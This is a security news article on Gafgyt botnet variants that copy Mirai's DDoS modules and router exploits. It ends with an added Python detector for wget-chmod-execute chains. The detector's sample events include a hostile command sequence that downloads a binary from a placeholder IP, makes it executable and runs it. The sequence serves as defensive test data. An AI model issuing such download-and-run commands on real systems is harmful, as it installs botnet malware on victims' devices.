16 April 2021

Gafgyt botnet re-uses some of Mirai’s DDoS modules

Threat research team at the cybersecurity company Uptycs has discovered several variants of the Gafgyt Linux-based botnet malware family that borrow some codes, techniques and implementations from the infamous Mirai botnet.

First spotted in 2014, Gafgyt (also known as Bashlite) usually targets vulnerable IoT devices, such as Huawei routers, Realtek routers and ASUS devices. It also uses some of the existing exploits (CVE-2017-17215, CVE-2014-8361) to download the next stage payloads.

“Gafgyt malware variants have very similar functionality to Mirai, as a majority of the code was copied,” the researchers said.

As for the latest Gafgyt versions, they have been found to include various methods to carry out DDoS attacks: HTTP flooding, UDP flooding, TCP flooding, and the STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.

Recent Gafgyt versions also incorporate a Mirai-copied telnet bruteforce scanner, as well as the GPON exploit (CVE-2018-10561), which is used for authentication bypass in vulnerable Dasan GPON routers.

“The Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using ‘wget’ command, fetches the payload,” the researchers said. “[It] gives the execution permission to payload using ‘chmod’ command, [and] executes the payload.”

“Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,” Uptycs said.

To prevent such attacks, users should regularly monitor for suspicious processes, events and network traffic spawned by the execution of any untrusted binary, and keep systems and firmware updated with the latest releases and patches.
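As an added illustration of the monitoring recommended above (example code written for this page, not from Uptycs or its report), the following Python detector correlates process-creation events from one parent and flags the wget -> chmod -> execute chain the researchers describe. The event format, the 60-second window and the sample command lines are assumptions constructed for the example.

```python
import os
import re
from collections import defaultdict

# Constructed process-creation events (timestamp, parent pid, command line);
# illustrative only, not telemetry from the Uptycs report.
SAMPLE_EVENTS = [
    (1618560000, 3100, "wget http://198.51.100.7/bins/arm7 -O /tmp/arm7"),
    (1618560002, 3100, "chmod 777 /tmp/arm7"),
    (1618560003, 3100, "/tmp/arm7 huawei"),
    (1618560100, 4200, "wget https://example.org/notes.txt -O /tmp/notes.txt"),
    (1618560101, 4200, "cat /tmp/notes.txt"),
]
WINDOW_SECONDS = 60  # assumed: fetch and execution must fall within this window
CHMOD_RE = re.compile(r"(?:\S*/)?chmod\s+(\S+)\s+(\S+)")

def wget_target(cmd):
    """Local file a wget command writes to: the -O argument, else the URL basename."""
    if not (m := re.match(r"(?:\S*/)?wget\s+(.*)", cmd)):
        return None
    args = m.group(1).split()
    if "-O" in args and args.index("-O") + 1 < len(args):
        return args[args.index("-O") + 1]
    urls = [a for a in args if a.startswith(("http://", "https://"))]
    return urls[0].rsplit("/", 1)[-1] if urls else None

def is_exec_mode(mode):
    """Approximate: octal mode with an odd digit, or a symbolic mode adding/setting x."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "x" in mode and ("+" in mode or "=" in mode)

def detect_download_exec_chains(events, window=WINDOW_SECONDS):
    """Yield (ppid, file, cmd) when a parent fetches via wget, chmods +x, then runs the file."""
    by_parent = defaultdict(list)
    for ts, ppid, cmd in sorted(events):
        by_parent[ppid].append((ts, cmd))
    for ppid, cmds in by_parent.items():
        fetched, executable = {}, set()  # basename -> fetch time; basenames given +x
        for ts, cmd in cmds:
            target, m = wget_target(cmd), CHMOD_RE.match(cmd)
            if target:
                fetched[os.path.basename(target)] = ts
            elif m and is_exec_mode(m.group(1)):
                executable.add(os.path.basename(m.group(2)))
            else:
                name = os.path.basename(cmd.split()[0])
                if name in fetched and name in executable and ts - fetched[name] <= window:
                    yield ppid, name, cmd
```

The benign parent 4200 downloads a file but never marks it executable or runs it, so only parent 3100 is reported.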
